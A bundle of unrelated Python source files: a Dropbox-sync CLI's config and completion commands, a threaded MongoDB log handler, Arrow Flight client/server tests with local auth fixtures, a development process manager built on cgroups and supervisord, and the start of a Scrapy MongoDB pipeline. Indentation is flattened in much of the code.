level_name = logging.getLevelName(m.log_level)
cli.echo(f"Log level: {level_name}")
@main.group(
section="Maintenance",
help="""
Direct access to config values.
Warning: Changing some config values must be accompanied by maintenance tasks. For
example, changing the config value for the Dropbox location needs to be accompanied by
actually moving the folder. This command only gets / sets the value in the config file.
Most changes will also require a restart of the daemon to become effective.
Use the commands from the Settings section instead wherever possible. They will take
effect immediately, perform accompanying tasks for you, and never leave the daemon in an
inconsistent state.
Currently available config keys are:
\b
- path: the location of the local Dropbox folder
- excluded_items: list of files or folders excluded by selective sync
- account_id: the ID of the linked Dropbox account
- notification_level: the level for desktop notifications
- log_level: the log level.
- update_notification_interval: interval in secs to check for updates
- keyring: the keyring backend to use (full path of the class)
- reindex_interval: the interval in seconds for full reindexing
- max_cpu_percent: maximum CPU usage target per core
- keep_history: the sync history to keep in seconds
- upload: if upload sync is enabled
- download: if download sync is enabled
""",
)
def config():
pass
@config.command(name="get", help="Print the value of a given configuration key.")
@click.argument("key", type=ConfigKey())
@config_option
def config_get(key: str, config_name: str) -> None:
from .config import MaestralConfig
from .config.main import KEY_SECTION_MAP
from .daemon import MaestralProxy, CommunicationError
# Check if the config key exists in any section.
section = KEY_SECTION_MAP.get(key, "")
if not section:
raise cli.CliException(f"'{key}' is not a valid configuration key.")
try:
with MaestralProxy(config_name) as m:
value = m.get_conf(section, key)
except CommunicationError:
value = MaestralConfig(config_name).get(section, key)
cli.echo(value)
@config.command(
name="set",
help="""
Update configuration with a value for the given key.
Values will be cast to the proper type, raising an error where this is not possible. For
instance, setting a boolean config value to 1 will actually set it to True.
""",
)
@click.argument("key", type=ConfigKey())
@click.argument("value")
@config_option
@convert_api_errors
def config_set(key: str, value: str, config_name: str) -> None:
import ast
from .config.main import KEY_SECTION_MAP, DEFAULTS_CONFIG
from .daemon import MaestralProxy
section = KEY_SECTION_MAP.get(key, "")
if not section:
raise cli.CliException(f"'{key}' is not a valid configuration key.")
default_value = DEFAULTS_CONFIG[section][key]
if isinstance(default_value, str):
py_value = value
else:
try:
py_value = ast.literal_eval(value)
except (SyntaxError, ValueError):
py_value = value
try:
with MaestralProxy(config_name, fallback=True) as m:
m.set_conf(section, key, py_value)
except ValueError as e:
cli.warn(e.args[0])
@config.command(name="show", help="Show all config keys and values")
@click.option("--no-pager", help="Don't use a pager for output.", is_flag=True)
@config_option
def config_show(no_pager: bool, config_name: str) -> None:
import io
from .config import MaestralConfig
conf = MaestralConfig(config_name)
with io.StringIO() as fp:
conf.write(fp)
if no_pager:
click.echo(fp.getvalue())
else:
click.echo_via_pager(fp.getvalue())
@main.command(
section="Maintenance",
help="""
Generate completion script for your shell.
This command can generate shell completion scripts for bash, zsh or fish. Follow the
instructions below for your shell to load the resulting script. The exact config file
locations might vary based on your system. Make sure to restart your
shell before testing whether completions are working.
### bash
You can enable shell completion for all users by generating and saving the script as
follows:
\b
maestral completion bash > /usr/share/bash-completion/completions/maestral
To enable shell completion for the current user only, save the script in a location of
your choice, for example `~/.local/completions/maestral`, and source it in `~/.bashrc`
by adding the line:
\b
. ~/.local/completions/maestral
### zsh
Generate a `_maestral` completion script and put it somewhere in your `$fpath`. For
example:
\b
maestral completion zsh > /usr/local/share/zsh/site-functions/_maestral
You can also save the completion script in a location of your choice and source it
in `~/.zshrc`. Ensure that the following is present in your `~/.zshrc`:
\b
autoload -Uz compinit && compinit
### fish
Generate and save a `maestral.fish` completion script as follows. For all users:
\b
maestral completion fish > /usr/share/fish/vendor_completions.d/maestral.fish
For the current user only:
\b
maestral completion fish > ~/.config/fish/completions/maestral.fish
""",
)
@click.argument("shell", type=click.Choice(["bash", "zsh", "fish"]))
def completion(shell: str) -> None:
from click.shell_completion import get_completion_class
comp_cls = get_completion_class(shell)
if comp_cls is None:
cli.warn(f"{shell} shell is currently not supported")
return
comp = comp_cls(main, {}, "maestral", "_MAESTRAL_COMPLETE")
try:
click.echo(comp.source())
except RuntimeError as exc:
cli.warn(exc.args[0])
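# Illustrative sketch (not part of the original module): the commands defined above can
# be exercised programmatically with click's CliRunner, e.g. in tests or scripts. The
# arguments shown here are examples only.
def _example_invoke_cli():
    from click.testing import CliRunner
    runner = CliRunner()
    # Generate the bash completion script without touching a running daemon. Other
    # commands can be invoked the same way by passing their argument list.
    result = runner.invoke(main, ["completion", "bash"])
    assert result.exit_code == 0
    return result.output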
|
log.py
|
# coding=utf-8
import logging
import sys
import traceback
from collections import OrderedDict
from datetime import datetime
from queue import Empty
from queue import Queue
from threading import Thread
from mongoengine import fields
from zspider.confs.conf import INNER_IP
from zspider.confs.conf import LOG_DATEFORMAT
from zspider.utils import engine
from zspider.utils.fields_models import FBaseQuerySet
from zspider.utils.fields_models import IpField
__author__ = "zephor"
LEVELS = OrderedDict()
LEVELS[logging.NOTSET] = "NSET"
LEVELS[logging.DEBUG] = "DBUG"
LEVELS[logging.INFO] = "INFO"
LEVELS[logging.WARN] = "WARN"
LEVELS[logging.ERROR] = "ERRO"
LEVELS[logging.FATAL] = "FATL"
class BaseLog(engine.DynamicDocument):
meta = {
"abstract": True,
"queryset_class": FBaseQuerySet,
"index_background": True,
"indexes": ["#ip", ("-time", "-msecs")], # hashed index
}
ip = IpField(required=True, verbose_name=u"机器ip")
pid = fields.IntField(required=True)
pathname = fields.StringField(verbose_name=u"文件")
lineno = fields.IntField(required=True, verbose_name=u"行号")
level = fields.IntField(default=logging.NOTSET, choices=LEVELS.keys())
msg = fields.StringField(verbose_name=u"信息")
time = fields.DateTimeField(required=True, verbose_name=u"时间")
msecs = fields.FloatField(required=True)
class LogCrawler(BaseLog):
meta = {
"max_size": 5 * 2 ** 30,
"max_documents": 10000000,
"indexes": ["task_id", "#url", "$task_name"],
}
task_id = fields.ObjectIdField(verbose_name=u"任务ID")
task_name = fields.StringField(max_length=32, verbose_name=u"任务名称")
url = fields.URLField()
class LogDispatcher(BaseLog):
meta = {"max_size": 512 * 2 ** 20, "max_documents": 1000000}
task_id = fields.ObjectIdField(verbose_name=u"任务ID")
class ThreadMongoHandler(logging.Handler):
# reserve or special handled fields
RECORD_FIELDS = {
"threadName",
"name",
"thread",
"created",
"process",
"processName",
"args",
"module",
"filename",
"levelno",
"msg",
"message",
"exc_info",
"funcName",
"relativeCreated",
"levelname",
"asctime",
}
def __init__(self, log_model, max_thread=2, *args):
super(ThreadMongoHandler, self).__init__(*args)
assert issubclass(log_model, BaseLog), "log_model must be a subclass of BaseLog"
        assert 0 < max_thread < 6, "max_thread must be between 1 and 5 (more threads are not efficient)"
self.log_cls = log_model
log_model.ensure_index(
"#ip"
) # prevent bug: non-thread safe mongoengine collection creation
self.q = Queue()
self._r = 1
thread_pool = self.tp = set()
while len(thread_pool) < max_thread:
process = Thread(target=self.record)
process.setDaemon(True)
thread_pool.add(process)
for p in thread_pool:
p.start()
@staticmethod
def _write(msg=None):
if msg is None:
msg = traceback.format_exc()
try:
sys.stderr.write(
"{0}: {1}".format(datetime.now().strftime(LOG_DATEFORMAT), msg)
)
except Exception:
pass
def handle(self, record):
rv = self.filter(record)
if rv:
self.emit(record)
return rv
def emit(self, record):
try:
self.format(record)
msg = {}
for k, v in record.__dict__.items():
if isinstance(v, (str, int, float)):
msg[k] = v
self.q.put_nowait(msg)
except Exception:
self.handleError(record)
def close(self):
self._r = 0
for p in self.tp:
p.join()
self._write("exit with %d logs remained\n" % self.q.qsize())
def record(self):
while self._r:
try:
msg = self.q.get(timeout=2)
except Empty:
continue
except SystemExit:
raise
except Exception:
self._write()
continue
log = self.log_cls(
ip=INNER_IP,
pid=msg["process"],
level=msg["levelno"],
msg=msg["message"],
time=msg["asctime"],
)
for k, v in msg.items():
if k not in self.RECORD_FIELDS:
setattr(log, k, v)
try:
log.save()
except AssertionError:
self._write()
except Exception:
                # unexpected save errors; these are supposed to be investigated and resolved
self._write()
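# Illustrative usage sketch (not part of the original module): attach the handler to a
# logger so that records are written to MongoDB asynchronously. The logger name and
# level used here are assumptions.
def _example_setup_crawler_logging():
    logger = logging.getLogger("zspider.crawler")
    handler = ThreadMongoHandler(LogCrawler, max_thread=2)
    handler.setLevel(logging.INFO)
    logger.addHandler(handler)
    return logger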
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import contextlib
import socket
import threading
import time
import pytest
import pyarrow as pa
from pyarrow.compat import tobytes
flight = pytest.importorskip("pyarrow.flight")
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)]),
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(flight.FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def __init__(self):
super(ConstantFlightServer, self).__init__()
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table)
class EchoFlightServer(flight.FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self):
super(EchoFlightServer, self).__init__()
self.last_message = None
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return iter([flight.Result(context.peer_identity())])
raise NotImplementedError
class InvalidStreamFlightServer(flight.FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
        assert data1[0].type != data2[0].type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(flight.FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_action(self, context, action):
time.sleep(0.5)
return iter([])
class HttpBasicServerAuthHandler(flight.ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
pass
def is_valid(self, token):
if not token:
raise ValueError("unauthenticated: token not provided")
token = base64.b64decode(token)
username, password = token.split(b':')
if username not in self.creds:
raise ValueError("unknown user")
if self.creds[username] != password:
raise ValueError("wrong password")
return username
class HttpBasicClientAuthHandler(flight.ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.username = tobytes(username)
self.password = tobytes(password)
def authenticate(self, outgoing, incoming):
pass
def get_token(self):
return base64.b64encode(self.username + b':' + self.password)
class TokenServerAuthHandler(flight.ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise ValueError("unauthenticated: invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise ValueError("unauthenticated: invalid token")
return token[7:]
class TokenClientAuthHandler(flight.ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
@contextlib.contextmanager
def flight_server(server_base, *args, **kwargs):
"""Spawn a Flight server on a free port, shutting it down when done."""
# Find a free port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with contextlib.closing(sock) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
auth_handler = kwargs.get('auth_handler')
ctor_kwargs = kwargs
if auth_handler:
del ctor_kwargs['auth_handler']
server_instance = server_base(*args, **ctor_kwargs)
def _server_thread():
server_instance.run(port, auth_handler=auth_handler)
thread = threading.Thread(target=_server_thread, daemon=True)
thread.start()
yield port
server_instance.shutdown()
thread.join()
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_flight_do_get_dicts():
table = simple_dicts_table()
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with flight_server(EchoFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with flight_server(EchoStreamFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with flight_server(InvalidStreamFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with flight_server(SlowFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
with pytest.raises(pa.ArrowIOError, match="Deadline Exceeded"):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
options = flight.FlightCallOptions(timeout=0.2)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
with pytest.raises(pa.ArrowException, match=".*unauthenticated.*"):
list(client.do_action(action))
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
with pytest.raises(pa.ArrowException, match=".*wrong password.*"):
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with flight_server(EchoStreamFlightServer,
auth_handler=token_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with flight_server(EchoStreamFlightServer,
auth_handler=token_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
with pytest.raises(pa.ArrowException, match=".*unauthenticated.*"):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
|
rundev.py
|
#!/usr/bin/python3
# Helpers to manage spawned processes.
# In development, provides one stream listing all events.
# In production, forwards process management to supervisord.
import argparse, os, tempfile, socket, json, fcntl, contextlib, subprocess, pipes, queue, atexit, threading, signal, sys, glob, pty, time, pwd, traceback
# ---------- Common -----------
def clear_env():
env = {}
for name in ['HOME', 'USER', 'LOGNAME']:
if name in os.environ:
env[name] = os.environ[name]
env['LANG'] = 'en_US.UTF-8'
env['PATH'] = '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
os.environ.clear()
os.environ.update(env)
def parse_env(env):
d = {}
for item in (env or []):
value = item.split('=', 1)
if len(value) == 1:
value = (value[0], os.environ[value[0]])
d[value[0]] = value[1]
return d
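# Illustrative only (not part of the original script): parse_env turns "KEY=VALUE"
# strings into a dict; entries without "=" are copied from the current environment.
def _parse_env_example():
    assert parse_env(['PORT=8080']) == {'PORT': '8080'}
    # Assumes HOME is set in the calling environment.
    assert parse_env(['HOME']) == {'HOME': os.environ['HOME']}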
# --------- Devel -----------
CG = None
def setup_cg():
global CG
CG = '/sys/fs/cgroup/cpu'
if os.path.exists(CG + '/lxc/') and len(os.listdir(CG)) == 1:
# We are running inside LXC
CG = glob.glob(CG + '/lxc/*')[0]
CG += '/rundev'
if not os.access(CG + '/tasks', os.O_RDWR):
print('Creating cgroup %r for %d...'
% (CG, os.getuid()))
subprocess.check_call(['sudo', 'mkdir', CG])
subprocess.check_call(['sudo', 'chown', str(os.getuid()), CG])
def add_to_cg():
    # Sometimes LXCFS (or cgroupfs?) perpetually returns 0 from os.write, hanging the
    # file.write function. We work around this (apparent) bug by reopening the FD.
for i in range(30):
with open(CG + '/tasks', 'a') as f:
s = (str(os.getpid()) + '\n').encode()
result = os.write(f.fileno(), s)
if result == len(s):
return
raise OSError('could not add task to cgroup (returned %d)' % result)
class PtyPopen():
# Runs children in a new PTY.
def __init__(self, args, environ, chdir):
self.args = args
self.environ = environ
self.chdir = chdir
pid, master = pty.fork()
if pid == 0:
add_to_cg()
try:
self._child()
except:
traceback.print_exc()
finally:
os._exit(0)
else:
self.pid = pid
self.stdout = os.fdopen(master, 'rb', 0)
def _child(self):
        for k, v in self.environ.items():
os.environ[k] = v
if self.chdir:
os.chdir(self.chdir)
os.execvp(self.args[0], self.args)
def kill_cg():
for i in range(5):
try:
tasks = open(CG + '/tasks').read().split()
except OSError:
return
tasks = [ pid for pid in tasks
if int(pid) != os.getpid() ]
print('[Killing tasks: %s]' % ' '.join(tasks))
if i == 0:
sig = 15
else:
sig = 9
if not tasks: break
subprocess.call(['sudo', 'kill', '-%d' % sig] + tasks)
time.sleep(0.3)
class colors:
gray = '\033[37m'
red = '\033[31m'
bg_red = '\033[101m'
reset = '\033[0m'
class DevServer():
def __init__(self):
self.output_queue = queue.Queue(100)
self.children = {}
def child(self, sock):
info = json.loads(sock.makefile().readline())
name = info['name']
if info['subname']:
name = info['subname'] + '/' + name
if name in self.children:
sock.sendall(b'A') # confirmation
self.output_queue.put((name, 'child already running'))
return
child = PtyPopen(info['command'], environ=info['env'],
chdir=info['chdir'])
self.children[name] = child
if name != '_initial':
msg = ('started: %s\n' % ' '.join(map(str, info['command'])))
self.output_queue.put((name, msg.encode('utf8')))
sock.sendall(b'A') # confirmation
while True:
try:
line = child.stdout.readline()
except OSError:
break
if not line:
break
self.output_queue.put((name, line))
_, status = os.waitpid(child.pid, 0)
exit_info = ('exited with status %d' % status) if info['oneshot'] else (colors.bg_red + '!!! PROCESS EXITED !!!' + colors.reset)
del self.children[name]
self.output_queue.put((name, exit_info.encode() + b'\n'))
def finish(self):
kill_cg()
os._exit(0)
def output_handler(self):
max_name_length = 10
while True:
name, line = self.output_queue.get()
max_name_length = max(max_name_length, len(name))
sys.stdout.buffer.write(((colors.gray + '[%s] ' + colors.reset) % (name.ljust(max_name_length))).encode())
sys.stdout.buffer.write(line)
sys.stdout.buffer.write(colors.reset.encode())
sys.stdout.buffer.flush()
if len(self.children) == 0 and self.output_queue.qsize() == 0:
print('No more running processes, exiting.')
self.finish()
def main(self, command, env):
setup_cg()
tmp_dir = tempfile.mkdtemp()
socket_path = tmp_dir + '/rundev.socket'
sock = socket.socket(socket.AF_UNIX)
sock.bind(socket_path)
sock.listen(5)
clear_env()
os.environ['RUNDEV_SOCKET'] = socket_path
os.environ.update(parse_env(env))
if os.environ.get('EXTPATH'):
os.environ['PATH'] = os.environ['EXTPATH'] + ':' + os.environ['PATH']
atexit.register(os.rmdir, tmp_dir)
atexit.register(os.unlink, socket_path)
threading.Thread(target=add, kwargs={
'name': '_initial',
'command': command,
'oneshot': True
}).start()
threading.Thread(target=self.output_handler).start()
signal.signal(signal.SIGINT, lambda *_: self.finish())
while True:
child, addr = sock.accept()
threading.Thread(target=self.child, args=[child]).start()
# --------- Production -----------
runtime_dir = None
def check_runtime_dir(create=False):
global runtime_dir
subname = os.environ.get('RUNDEV_SUBNAME', 'rundev')
link = os.path.expanduser('~/.config/%s' % subname)
if not os.path.exists(os.path.dirname(link)):
os.mkdir(os.path.dirname(link))
if not os.path.exists(link):
if not create:
raise Exception('supervisord not yet running (use `rundev init`)')
try:
os.unlink(link)
except OSError:
pass
dirname = tempfile.mkdtemp()
os.symlink(dirname, link)
runtime_dir = os.readlink(link)
@contextlib.contextmanager
def lock():
with open(runtime_dir + '/lock', 'w') as f:
fcntl.flock(f, fcntl.LOCK_EX)
yield
def which(path, program):
fpath, fname = os.path.split(program)
if fpath:
return program
else:
for path in path.split(':'):
path = path.strip('"')
if not path: continue
exe_file = os.path.join(path, program)
if os.path.isfile(exe_file):
return exe_file
return program
def create_supervisor_config():
with open(runtime_dir + '/processes.json', 'r') as f:
info = json.loads(f.read())
config = '''
[supervisord]
childlogdir={logdir}
[unix_http_server]
file={runtime_dir}/supervisord.sock
chmod=0700
[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface
[supervisorctl]
serverurl=unix://{runtime_dir}/supervisord.sock
'''.format(runtime_dir=runtime_dir, logdir=info['logdir'])
def supervisor_quote(s):
return pipes.quote(s).replace('%', '%%')
for process in info['processes'].values():
environ = dict(info['env'])
environ.update(process['env'])
command = list(process['command'])
path = os.environ['PATH']
if environ.get('EXTPATH'):
path = environ['EXTPATH'] + ':' + path
command[0] = which(path, command[0]) # supervisord doesn't handle PATH properly
config += '''
[program:{name}]
command={command}
redirect_stderr=True
'''.format(name=process['name'],
command=' '.join(map(supervisor_quote, command)))
if process['oneshot']:
config += 'startsecs=0\nautorestart=false\n'
if process['chdir']:
config += 'directory=%s\n' % supervisor_quote(process['chdir'])
for k, v in environ.items():
config += 'environment=%s=%s\n' % (supervisor_quote(k), supervisor_quote(v))
if 'EXTPATH' in environ:
config += 'environment=PATH=%s\n' % supervisor_quote(path)
if process.get('user'):
config += 'user=%s\n' % supervisor_quote(process['user'])
config += 'environment=HOME=%s\n' % supervisor_quote(pwd.getpwnam(process['user']).pw_dir)
with open(runtime_dir + '/supervisord.conf', 'w') as f:
f.write(config)
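# For illustration only (assumed output, not captured from a real run): a process named
# "web" with command ["python", "server.py"] and oneshot=False would yield roughly:
#
#   [program:web]
#   command=/usr/bin/python server.py
#   redirect_stderr=True
#
# plus optional directory=, user= and environment= lines depending on the process info.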
def save_process(process_info):
with open(runtime_dir + '/processes.json', 'r') as f:
info = json.loads(f.read())
info['processes'][process_info['name']] = process_info
with open(runtime_dir + '/processes.json', 'w') as f:
f.write(json.dumps(info, indent=2))
def start_supervisor():
if not os.path.exists(runtime_dir + '/supervisord.sock'):
create_supervisor_config()
subprocess.check_call(['supervisord', '-c', runtime_dir + '/supervisord.conf'])
def add_process(info):
check_runtime_dir(create=False)
with lock():
save_process(info)
ctl = ['supervisorctl', '-c', runtime_dir + '/supervisord.conf']
create_supervisor_config()
subprocess.check_call(ctl + ['reread'])
subprocess.check_call(ctl + ['update'])
def run_ctl(command):
check_runtime_dir(create=False)
cmd = ['supervisorctl', '-c', runtime_dir + '/supervisord.conf'] + command
os.execvp(cmd[0], cmd)
def init_production(logdir, env):
check_runtime_dir(create=True)
if not logdir:
logdir = os.path.expanduser('~/.logs')
try:
os.mkdir(logdir)
except OSError:
pass
with lock():
with open(runtime_dir + '/processes.json', 'w') as f:
f.write(json.dumps({
'processes': {},
'env': parse_env(env),
'logdir': logdir
}))
start_supervisor()
# ---------- Commands -------------
def add(name, command, env={}, user=None, oneshot=False, chdir=None):
info = {
'name': name,
'command': command,
'env': env,
'chdir': chdir,
'oneshot': oneshot,
'user': user,
}
if 'RUNDEV_SOCKET' in os.environ:
# development, send arguments to development console
sock = socket.socket(socket.AF_UNIX)
info['subname'] = os.environ.get('RUNDEV_SUBNAME')
sock.connect(os.environ['RUNDEV_SOCKET'])
sock.sendall((json.dumps(info) + '\n').encode())
sock.recv(1)
sock.close()
else:
add_process(info)
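# Illustrative usage sketch (not part of the original script); the names, commands and
# paths below are assumptions.
def _example_register_processes():
    # A long-running web process and a one-off migration step.
    add('web', ['python3', 'server.py'], env={'PORT': '8080'}, chdir='/srv/app')
    add('migrate', ['python3', 'manage.py', 'migrate'], oneshot=True)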
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='action')
subparser = subparsers.add_parser(
'dev',
help='Runs process inside development console.')
subparser.add_argument('command', nargs='+')
subparser.add_argument('--env', action='append')
subparser = subparsers.add_parser(
'init',
help='Initializes production environment.')
subparser.add_argument('--logdir')
subparser.add_argument('--env', action='append')
subparser.add_argument('command', nargs='*')
subparser = subparsers.add_parser(
'ctl',
help='Runs supervisorctl.')
subparser.add_argument('command', nargs='*')
subparser = subparsers.add_parser(
'add',
help='Adds or updates and spawns a new process.')
subparser.add_argument('name',
help='Process name.')
subparser.add_argument('command',
nargs='+',
help='Command to run')
subparser.add_argument('--oneshot',
action='store_true',
help='Is it normal for this process to exit?')
subparser.add_argument('--user',
help='Change user before executing')
ns = parser.parse_args()
if ns.action == 'dev':
DevServer().main(ns.command, ns.env)
elif ns.action == 'ctl':
run_ctl(ns.command)
elif ns.action == 'init':
init_production(logdir=ns.logdir, env=ns.env)
if ns.command:
os.execvp(ns.command[0], ns.command)
elif ns.action == 'add':
add(ns.name, ns.command, oneshot=ns.oneshot, user=ns.user)
else:
parser.print_usage()
if __name__ == '__main__':
main()
|
pipelines.py
|
import asyncio
import os
import queue
import threading
import time
from collections import defaultdict
from dataclasses import asdict
from typing import Optional
import pymongo
from loguru import logger
from pymongo import ASCENDING, IndexModel
from . import items
def _get_mongo_uri() -> str:
with open(os.environ.get("DRAGON_TALON_DB_USERNAME_FILE"), "rt") as fs:
username = fs.read().strip()
with open(os.environ.get("DRAGON_TALON_DB_PASSWORD_FILE"), "rt") as fs:
password = fs.read().strip()
return f"mongodb://{username}:{password}@mongodb:27017"
class MongoPipeline:
_QUEUE_SENTINEL = None
def __init__(self, spider_name: str):
self._mongo_uri = _get_mongo_uri()
self._spider_name = spider_name
self._mongo_cli = pymongo.MongoClient(self._mongo_uri, tz_aware=True)
self._db_inst = self._mongo_cli.get_database("scrapy")
self._init_collections(spider_name)
self._item_queue = queue.Queue(maxsize=1000)
self._consume_thread = threading.Thread(target=self._consume_items, daemon=True)
def _init_collections(self, spider_name: str):
if spider_name == "lianjia":
xiaoqu_info_col = self._db_inst.get_collection(items.XiaoquInfo.item_name)
index1 = IndexModel([("xiaoqu_id", ASCENDING)], unique=True)
index2 = IndexModel([("district", ASCENDING), ("area", ASCENDING)])
xiaoqu_info_col.create_indexes([index1, index2])
xiaoqu_daily_stats_col = self._db_inst.get_collection(items.XiaoquDailyStats.item_name)
index1 = IndexModel([("date_", ASCENDING), ("xiaoqu_id", ASCENDING)], unique=True)
xiaoqu_daily_stats_col.create_indexes([index1])
transaction_col = self._db_inst.get_collection(items.Transaction.item_name)
index1 = IndexModel([("date_", ASCENDING), ("house_id", ASCENDING)], unique=True)
index2 = IndexModel([("xiaoqu_id", ASCENDING), ("date_", ASCENDING)])
transaction_col.create_indexes([index1, index2])
forsale_col = self._db_inst.get_collection(items.Transaction.item_name)
index1 = IndexModel([("date_", ASCENDING), ("house_id", ASCENDING)], unique=True)
index2 = IndexModel([("xiaoqu_id", ASCENDING), ("date_", ASCENDING)])
forsale_col.create_indexes([index1, index2])
else:
